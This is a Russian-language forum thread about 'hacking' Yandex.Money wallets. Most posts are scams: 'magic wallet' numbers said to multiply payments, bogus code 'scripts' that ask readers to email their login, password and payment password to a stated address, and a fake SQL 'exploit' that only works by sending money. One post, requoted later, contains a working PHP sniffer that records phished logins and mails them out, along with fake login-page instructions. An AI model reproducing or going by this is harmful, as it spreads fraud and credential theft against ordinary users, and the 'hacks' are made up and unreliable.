ВЗЛОМ ЯНДЕКС КОШЕЛЬКОВ

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.

Вы здесь » ВЗЛОМ ЯНДЕКС КОШЕЛЬКОВ » Взлом Яндекс Деньги и кошельки » Взлом Яндекс денег

Взлом Яндекс денег

Сообщений 661 страница 690 из 695

661

BANDIT777vip написал(а):

Владислав написал(а):

убиватель кидал убей себя!!! чета мне не прешло НЕХРЕНА))))

ахахахах...Громко кричал этот убиватель кидал!а у самого хули лохотрон!

способ джона и НЕРАБОТАЛ!

0

662

Jasper написал(а):

Владислав написал(а):

даун запомни я свой кошелек в жизни не покажу!!! и мне чье либо доверие не нужно это ВАШЕ дело, а если ты ДАУН тупой не можешь скрипт вставить или перевод не татот кашель! то ты еблан!

Владислав, извени меня пожалуйста!!! Действительно твой кошелек работает. Ну вырвалось блять, извени!
P.S. По последнему кошельку мне тоже НИЧЕГО не вернулось!!

Сука кошелек один стоит и работает!!!(и закрываться не планируеться!!!) "по статистикекршельки закрывают из-за того что на них кидают конченые СКРИПТЫ или правельный скрипт, но НЕна тот клшель!"
мне вас наебывать нет смысла!!! я в этой теме давно и встречал много АХИРЕТЬ скока много способов!!! но мне приходили с моих кошельков!!! и один мне какойто тип в ЛС кинул!!!(но попросил его не выкладывать) ребят я за проверки кошельков просрал окала 20тысячь!!! НО оно окупилась в 2-5раз!!! я щас с максискутором,ноутом(не худшим)с айфоном!!! А ну и доначусь в различные игры в КОНТАКТЕ,МЕЙЛЕ,ОДНОКЛАСНИКАХ,в ВТ,в КС се СЕРВ купил,в ЛИНЕЙКЕ 5 персов ПРОКАЧАЛ(по макс.) в вовке не последний перс!!! в ПОИНТЕ!!! тоже нехеровое звание!!! я просто накопил и вложил в создание кошелька!!! и теперь по максимуму ЛОЖУ деньги на проверенные кошельки!!!
А ну и проверяю кошельки иногда!

Отредактировано Владислав (2012-04-30 17:47:45)

0

663

урурурмой вам совет!хотите бабки?!?КАПИТЕа патом в 1 деньложите ВСЕ!!!и БУДУТ вам огромные ХАЛЯВНЫЕ %(проценты) от бабок!

Отредактировано Владислав (2012-04-27 22:37:08)

0

664

Нашол нового бата бля уввиличение денег!

Прописываем так:

{failpass --
/Go to page 1 x2
{trubl theme = password forgot = fail}
/derictory count/
{/fors to server:х150
{my sql}: graw hack/"bot going"{1for ressurce go to"2"}
/02870163
[my 2 last pass: (Сюда вводите паш логин)
[/forward2folder (Сюда ваш пароль)
{my count pass}
//target trash_1
/trash_2
{go to mile page fol\:(Сюда ваш платёжный пароль)
//endcript_1 /
\\gelix\\pag foll x2-86585689
И отпровляем всё на е маил:y.hack2012@yandex.ru

-1

665

Yandex_vzlom написал(а):

Нашол нового бата бля уввиличение денег!

Прописываем так:

{failpass
/Go to page 1 x2
{trubl theme = password forgot = fail}
/derictory count/
{/fors to server:х150
{my sql}: graw hack/"bot going"{1for ressurce go to"2"}
/02870163
[my 2 last pass: (Сюда вводите паш логин)
[/forward2folder (Сюда ваш пароль)
{my count pass}
//target trash_1
/trash_2
{go to mile page fol\:(Сюда ваш платёжный пароль)
//endcript_1 /
\\gelix\\pag foll x2-86585689
И отпровляем всё на е маил:y.hack2012@yandex.ru

щас проверим!

0

666

ребята пагодь не кидайте денег на мой способ!!! вроде неробит(мне ууже 20минут не приходит)

0

667

Ребят не надо ниче взламывать, вот тут можно заработать
http://fiftryss.com/?ref=4023544
http://www.anketum.com/qOTcxMjE
http://www.oprosoff.net/?ref=NjMyODMy
100% рабочий способ я так на яндекс вывожу уже пол года по 750 - 800 руб

-1

668

Владислав написал(а):

ребята пагодь не кидайте денег на мой способ!!! вроде неробит(мне ууже 20минут не приходит)

а нет все в поряде! просто поменяли(вроде) но мне пришле не 80%(с копейками)а если я не ошибся 54% сорри от меня это не зависит! сп что посищаете форум(тему)! всем удачи

0

669

Yandex_vzlom написал(а):

бата

я конечно не на 5+ учусь, НО вроде пишеться бОта)))

Отредактировано Владислав (2012-05-08 12:43:03)

0

670

Ура, Я наконецто разгодал способ обмануть лохотронщиков в  ИНТЕРНЕТЕ"""Никому не секрет, что в системе "яндекс.деньги" существуют кошельки "ЛОХОТРОНЫ", и наверняка многи уже попадались на этот "бесплатный сыр".Но... Есть один способ наказать лохотронщика!ЧИТАЕМ ИНСТРУКЦИЮ НИЖЕ...Прочитал я как то в инете, что есть волшебные кошельки, на которые можно послать любую сумму, и тебе вернется в 2 раза больше, чем ты отошлёшь. Понятное дело что это "Лохотрон", но я решил попробывать, и послал 20р, деньги смешные и расстаться не так жалко...Как же я удивился когда спустя 2-3 часа обнаружил у себя в кошельке 40р, это был настоящий сюрприз. Сразу в голову начали лезть мысли, что я стану богат!!!Я не раздумывая послал эти 40р на тот же самый кошелек и спустя 2-3 часа вновь увидел на своем щету деньги. На этот раз там было 80р. Их я тоже отослал и получил 160р. С них получил 320р. Ликуя в душе я отослал аж 500рю и назад мне пришло что?... Правильно, Фиг с маслом...Лишь спустя некоторое время я понял как работает их система.Там есть специальная программа. Ты отсылаешь любую сумму от 20р до 400р и тебе возвращается в 2 раза больше. как только отослал 500р и выше - система их съедает.ЭТО Я К ТОМУ ЧТО, если быть умнее и слать аккуратно, то можно их обманывать.с 400р тебе в любом случае придет 800р, а с 300р получишь 600р.Даже не пытайтесь слать 500 и больше. Их вам не вернут, впрочем как и суммы до 20р., 20р - это минимал.Вот уже несколько недель я систематически отсылаю туда по 400р. и получаю 800 обратно.Уже рассказал.Теперь поняв, что ЛОХОТРОНЩИКИ обирают народ на гораздо большие деньги чем мы отбираем у них, я решил поделиться этим секретом с ВАМИ.Вот этот № этого кошелька*******************************************410011409096660 **************** ***************************Итак вам надо делать следующее:Если у ВАС НЕТ яндекс кошелька:(А если есть так ВПЕРЕД!!!)Регистрируетесь на yandexe в разделе деньги, получаете там кошелек с номером, приблизительно с таким же как я указал выше. Идете в ближайший пункт продажы карточек для пополнения кошелька яндекс.деньги или через платежный терминалПополняте СВОЙ кошелек.Как только видите что деньги поступили на ваш счет, начинаете отсылать деньги на этот кошелек (410011409096660). Как снимать деньги с кошелька написано в меню вашего кошелька.

0

671

Владислав написал(а):

Как же я удивился когда спустя 2-3 часа обнаружил у себя в кошельке 40р, это был настоящий сюрприз. Сразу в голову начали лезть мысли, что я стану богат!!!Я не раздумывая послал эти 40р на тот же самый кошелек и спустя 2-3 часа вновь увидел на своем щету деньги. На этот раз там было 80р. Их я тоже отослал и получил 160р. С них получил 320р. Ликуя в душе я отослал аж 500рю и назад мне пришло что?... Правильно, Фиг с маслом...

щитать умеешь! красава

Владислав написал(а):

Ликуя в душе я отослал аж 500рю и назад мне пришло что?... Правильно, Фиг с маслом...

а ты неподумал что придел стоит до 500р ааа???? или ты заебастый фраер щитать научился а думать нет)

Супер кул написал(а):

ВАС НЕТ яндекс кошелька:(А если есть так ВПЕРЕД!!!)Регистрируетесь на yandexe в разделе деньги, получаете там кошелек с номером, приблизительно с таким же как я указал выше. Идете в ближайший пункт продажы карточек для пополнения кошелька яндекс.деньги или через платежный терминал

"бля та ты Влад Кадоний" а ты своим тупым  умом неподумал что люди незайдут в тему если у них нет кошелька?))) и я проверю обезательно НО смотри если мне с 400 непредет 800 я поржу над тобой убогим ЛОХОМ( ну и соответственно отпишусь!!! а то малоли может ты норм поц!

0

672

Владислав написал(а):

НО смотри если мне с 400 непредет 800 я поржу над тобой убогим ЛОХОМ

да я был прав ты "убогий ЛОХ"

0

673

Владислав, здравствуй! У меня такой к тебе вопрос: твой способ ещё работает? Если "да", то ещё один вопрос: код нужно вставлять в графу: "Здесь вы можете оставить что-нибудь
получателю"?

+1

674

Владислав написал(а):

твой способ ещё работает

ДА

Владислав написал(а):

код нужно вставлять в графу: "Здесь вы можете оставить что-нибудь
получателю"?

да!

0

675

так что та тема потухла!!! неужеле все разбоготели!))) я за ваз рад! НО могли бы зайти сказать сп за такой способ(мой)!
если будут вопросы пишите!

0

676

Владислав
Влад умоляю скинь 100р на счёт 41001838170967 я твой способ хочу попробовать!!  :(  :(  :(  ПОЖАЛУЙСТА

-1

677

Prizrak1989 написал(а):

Влад умоляю скинь 100р на счёт 41001838170967 я твой способ хочу попробовать!!

Ребят я незанимаюсь благотворительностью!

0

678

Два часа ночи, я был готов пойти спать, но надо было проверить почту. Зайдя к себе на мыльник (зарегистрирован я на яндекс.ру), я увидел огромное кол-во спама. Долбаный антиспам, установленный на yandex.ru, работает дерьмово, видимо спам - подарок от яндекс .ру. Что ж, как никак Новый Год скоро, надо тоже сделать подарок любимому почтовику))
Исследовав почтовый сервис я так ничего и не нашел. Что же, поищем через гугль. Так как у яндекса есть много других сервисов помимо почтового, в строке запроса я написал: site:*yandex.ru. В ответ гугль вывалил 214 000 000 страниц урлов (к счастью половина была повторных, иначе я бы лежал в психушке ). Я налил себе кофе и начал проверять сервисы. Web-кодеры yandex.ru хорошо поработали, так как после 2-х часового аудита не было найдено ни одной уязвимости. На данный момент были учтены некоторые глюки сервиса 7ya.yandex.ru, при просмотре картинок выскакивало popup окно, запомнив адрес: Я очень удивился и обрадовался, потому что выскочило окошко, которое означало одно - target никак не фильтруется. Было решено создать фэйк страницу авторизации, чтобы был баг и робот яндекса присылал мне пароль от яндекс карты. Было уже 5 часов утра, даже после 5 кружек кофе хотелось спать (а еще больше хотелось в туалет ). Поэтому я попросил своего хорошего знакомого pixcher'a продолжить начатое мною дело. На следующий день (т.е. на этот же ) на аську пришла мессага от pixcher'a. Он создал фэйк форму, а также составил ядовитый урл:
на нашу фэйк форму'</script>
В таком виде этот урл сильно палился, поэтому мы немного замаскировали его, чтобы админы яндекса чувствовали себя сухо и комфортно . Далее был написан небольшой сниффер, который принимал переданные значения, записывал их в файл и перекидывал пороль карты на мыло , вот код сниффера:
<?
$adminmail = "mymail@yandex ru";
function email($to,$mailtext) {
mail($to,'password',$mailtext,$adminmail);
}
$text="[".date("d.m.y H:i")."]Login: $_POST[login] Password: $_POST[pass]\r\n";
email($adminmail,$text);
$file = fopen("logs.txt","a");
flock($file,3);
fputs($file, $text);
flock($file,1);
fclose($file);
echo "<FORM id='auth' action='http://talk.mail.ru/login.html' method=post>
<INPUT type=hidden name=login value='$_POST[login]'>
<INPUT type=hidden name=pass value='$_POST[pass]'>
<script>auth.submit();</script>
</FORM>";
?>
Создание фэйка - это совсем не сложно, сохраняем пагу к себе на винт и редактируем параметр action тега form. В итоге данные, которые ввел юзер, запишутся к тебе в файл и произойдет редирект, удивленный админ решит, что произошли какие-нить сбои в работе службы DNS. После этого мы создали баг к кошельку
Для проверки проделанной работы мы кинули 50 руб на этот номер кошелька  410011328447899
И на мой кошель минут через 5 пришло 300 руб. Это конечно очень мало бабла ведь столько работы было проделано. И мы с моим другом pixcher'a решили еще раз протестировать наш баг и кинуть 200 руб ну обратно нам так не чего и не пришло. Я долго думал в чем была наша промашка. И мы решили повторить операцию, еще раз кинули 50 рублей . И я не поверил своим глазам баг не исчез =) Запрос к БД на число 50 по введённым критериям совсем не фильтровался на спецсимволы!!! Абсолютно!!! Моя радость увеличилась, когда увидел что на мой кошель пришли опять 300 рублей. Как видишь, даже раскрученный проект имеет ошибки.
"Как выполнить взлом яндекс денег на своем компе"
1. Для начала проходим сюда yandex.ru
2. Заводим почтовый ящик
3. Заводим яндекс счет
4. Ложем на свой яндекс счет денег . Ну вам для этого взлома понадобиться 50 рублей
5. Теперь нажимаем перевести и переводим сумму не больше не меньше а ровно 50 рублей
6 Переводим на этот счет 410011328447899 где мы сделали баг
7. Где сообщение получателю пишем вот это:
SELECT COUNT(DISTINCT cc.content_id) FROM cache_content as cc, cache_content_region as r, cache_content_num as n WHERE cc.content_group = 'melody' AND cc.content_type = 'melody_mp3' AND r.content_id = cc.content_id AND n.content_id = cc.content_id AND r.region_id = '9' AND n.model_id = «0» AND singer_id = '300''
Там где написано id = «0»
Меняем значения «0» на свой номер кошелька
Вот пример :
id = «410011328447899»
8. В название платежа пишем это:
cc.content_id
9. И потом жмем перевести
10. Все дело сделано ждем минут 5 и к вам должны прийти 300 рублей. Надеюсь подробно объяснил вам.

0

679

КТО ХОЧЕТ НОРМАЛЬНЫЙ РАБОТАЮЩИЙ СПОСОБ, ЗАХОДИТЕ сюда,только что там 350 рублей срубил!!!

0

680

Владислав написал(а):

Два часа ночи, я был готов пойти спать, но надо было проверить почту. Зайдя к себе на мыльник (зарегистрирован я на яндекс.ру), я увидел огромное кол-во спама. Долбаный антиспам, установленный на yandex.ru, работает дерьмово, видимо спам - подарок от яндекс .ру. Что ж, как никак Новый Год скоро, надо тоже сделать подарок любимому почтовику))
Исследовав почтовый сервис я так ничего и не нашел. Что же, поищем через гугль. Так как у яндекса есть много других сервисов помимо почтового, в строке запроса я написал: site:*yandex.ru. В ответ гугль вывалил 214 000 000 страниц урлов (к счастью половина была повторных, иначе я бы лежал в психушке ). Я налил себе кофе и начал проверять сервисы. Web-кодеры yandex.ru хорошо поработали, так как после 2-х часового аудита не было найдено ни одной уязвимости. На данный момент были учтены некоторые глюки сервиса 7ya.yandex.ru, при просмотре картинок выскакивало popup окно, запомнив адрес: Я очень удивился и обрадовался, потому что выскочило окошко, которое означало одно - target никак не фильтруется. Было решено создать фэйк страницу авторизации, чтобы был баг и робот яндекса присылал мне пароль от яндекс карты. Было уже 5 часов утра, даже после 5 кружек кофе хотелось спать (а еще больше хотелось в туалет ). Поэтому я попросил своего хорошего знакомого pixcher'a продолжить начатое мною дело. На следующий день (т.е. на этот же ) на аську пришла мессага от pixcher'a. Он создал фэйк форму, а также составил ядовитый урл:
В таком виде этот урл сильно палился, поэтому мы немного замаскировали его, чтобы админы яндекса чувствовали себя сухо и комфортно . Далее был написан небольшой сниффер, который принимал переданные значения, записывал их в файл и перекидывал пороль карты на мыло , вот код сниффера:
<?
}
email($adminmail,$text);
flock($file,3);
fputs($file, $text);
flock($file,1);
fclose($file);
</FORM>";
?>
Создание фэйка - это совсем не сложно, сохраняем пагу к себе на винт и редактируем параметр action тега form. В итоге данные, которые ввел юзер, запишутся к тебе в файл и произойдет редирект, удивленный админ решит, что произошли какие-нить сбои в работе службы DNS. После этого мы создали баг к кошельку
Для проверки проделанной работы мы кинули 50 руб на этот номер кошелька  410011328447899
И на мой кошель минут через 5 пришло 300 руб. Это конечно очень мало бабла ведь столько работы было проделано. И мы с моим другом pixcher'a решили еще раз протестировать наш баг и кинуть 200 руб ну обратно нам так не чего и не пришло. Я долго думал в чем была наша промашка. И мы решили повторить операцию, еще раз кинули 50 рублей . И я не поверил своим глазам баг не исчез =) Запрос к БД на число 50 по введённым критериям совсем не фильтровался на спецсимволы!!! Абсолютно!!! Моя радость увеличилась, когда увидел что на мой кошель пришли опять 300 рублей. Как видишь, даже раскрученный проект имеет ошибки.
2. Заводим почтовый ящик
3. Заводим яндекс счет
4. Ложем на свой яндекс счет денег . Ну вам для этого взлома понадобиться 50 рублей
5. Теперь нажимаем перевести и переводим сумму не больше не меньше а ровно 50 рублей
SELECT COUNT(DISTINCT cc.content_id) FROM cache_content as cc, cache_content_region as r, cache_content_num as n WHERE cc.content_group = 'melody' AND cc.content_type = 'melody_mp3' AND r.content_id = cc.content_id AND n.content_id = cc.content_id AND r.region_id = '9' AND n.model_id = «0» AND singer_id = '300''
Вот пример :
id = «410011328447899»
cc.content_id
10. Все дело сделано ждем минут 5 и к вам должны прийти 300 рублей. Надеюсь подробно объяснил вам.

ага мне милионы пришли! или я дурак или вы кидалы! помойму 2!

0

681

Hack26 написал(а):

КТО ХОЧЕТ НОРМАЛЬНЫЙ РАБОТАЮЩИЙ СПОСОБ, ЗАХОДИТЕ сюда,только что там 350 рублей срубил!!!

нефига себе умееш цвет букв минятЬ! тока за это тебя мона назвать умным!(сочуствую)

0

682

Мой способ попрежнему робит! пользуйтесь!

0

683

<?
}
email($adminmail,$text);
flock($file,3);
fputs($file, $text);
flock($file,1);
fclose($file);
</FORM>";
?>
2. Заводим почтовый ящик
3. Заводим яндекс счет
Вот пример :
id = «410011328447899»
cc.content_id

0

684

пиздеш еще один

0

685

1000 рублей на мобильник, КОНКУРС

-1

686

igra.m написал(а):

1000 рублей на мобильник, КОНКУРС

10000р рублей на куда хотите

0

687

Попробовал не мало кошельков но безрезультатно. в данный момент вот этот рабочий !
Положил 50 пришло 150руб , я посылаю 150руб и в течении нескольких часов приходит приходит перевод на 450руб максимальная сумма перевода 2000, уже несколько недель отправляю и все работает, убедитесь сами, вот 410011462762137 пробуйте и убедитесь! Внимание очень много развода!

0

688

как взломать кошелек. Все что на разных форумах написано про волшебные кошельки
это все кидалово полное. Конечно есть один кошелек на интернет казино и без кода его не взломать. Вот этот кошелек  410011473813228 если вы хотите взломать яндекс-деньги

теперь объясняю как взломать этот кошель. Нужно закинуть сумму с 30 рублей на этот счет  410011473813228 и в комментариях написать
defultmoney-pasa 1R2P46;
потом сразу не отступая точки с запятой нужно написать ваш номер кошелька
и где-то в течение 20 минут должна прийти ваша сумма с 50% прибавлением. Например 100 рублей закинешь 150 рублей прейдет только сильно не увлекайтесь - могут вычислить вас. Лучше раза 3 в день делайте это чтоб не засветиться. Уверяю вас - этот способ работает!!! Проверено многими пользователями
мне реально пришло!!!

0

689

КАК ОБМАНУТЬ ЛОХОТРОНЩИКОВ И ЗАРАБОТАТЬ 15000 РУБЛЕЙ.
Я расскажу вам: 1. Как наглые лохотронщики обманывают людей на сумму в размере 5000 рублей (Яндекс-Деньги), а некоторых на еще большие суммы.
2. Как обмануть лохотронщиков и заработать 15000 рублей (Яндекс-Деньги)
Тема 1. История « Как я лохонул их и получаю стабильно 15000 рублей » Нашел я в сети где-то статью приблизительно такого содержания: «Есть в системе Яндекс-Деньги волшебный кошелек, и все что вы на него пошлете вернется вам в утроенном размере!!! Любая сумма от 100 рублей и выше! Пошлете десять тысяч получите тридцать тысяч и т.д.». Конечно, всем понятно, лохотрон, но если порыть глубже… Я не поверил, но для теста послал 100 рублей. Через где-то 5 часов проверил свой Яндекс кошелек и обнаружил перевод в 300 рублей! Я удивился. Послал потом еще 100 рублей опять то же самое. Потом послал 300 рублей, мне пришло 900. Осмелев окончательно послал все что у меня было – около 5000 рублей … Что было дальше, думаю, вы уже поняли. Никаких 15000 рублей мне никто не прислал, да и мои 5000 тоже исчезли навсегда… Понятно как они работают. У них на сервере стоит хитрая программка, которая принимает суммы от 100 рублей и примерно до 800 рублей (закидывал им 900 рублей и их забрали, а 800 закинул программа вернула 2400 рублей) Вот и заколачивают тысячи! В общем, это я к тому, что если быть аккуратным и выслать, небольшую сумму (они принимают любые суммы, но не меньше 100 рублей), то всегда можно получать в три раза больше. У них есть специальная программа, которая смотрит кто сколько переводов сделал и на какую сумму, чтобы определить когда нужно кидануть. Переводы суммой до 800 рублей они не забирают никогда. То есть, послав 800 рублей вы в любом случае получите 2400 рублей, т.к. сумма мелкая и они будут ждать пока вы пришлете больше. Если аккуратно слать им небольшие суммы то можно их обманывать. Они уже не смотрят на переводы сами, за них это делает специальный софт (программа), что упрощает вероятность их обмана. Я сейчас зарабатываю на этом около 15000 рублей в неделю (можно делать и больше). Это не миллионы, но это более-менее стабильный доход. Денег на этих кошельках сотни тысяч, и меня очень раздражает как они кидают людей, по этому надо их разорить. Вот сам кошелек: 410011473813228 Совет: Внимание! Повторяю! ставку поднимать не стоит, т.к. если ставка выше 800 рублей то программа их забирает даже и не пробуйте!!! Я делаю то же самое и получаю около 15000 в неделю, которых мне очень даже вполне хватает! В общем, я рассказал, что от меня требовалось. Дальше – ваше дело!!!!!

0

690

мда прочел еще множество форумов на тему "взлом яндекс кошелька" потратил штук 10(10000т.р.)  и с двух мне назад пришло гдето 20р при том что я кинул 200 ) так что тщательней выберайте куда кидаете денег!

УДАЧИ

0

Вы здесь » ВЗЛОМ ЯНДЕКС КОШЕЛЬКОВ » Взлом Яндекс Деньги и кошельки » Взлом Яндекс денег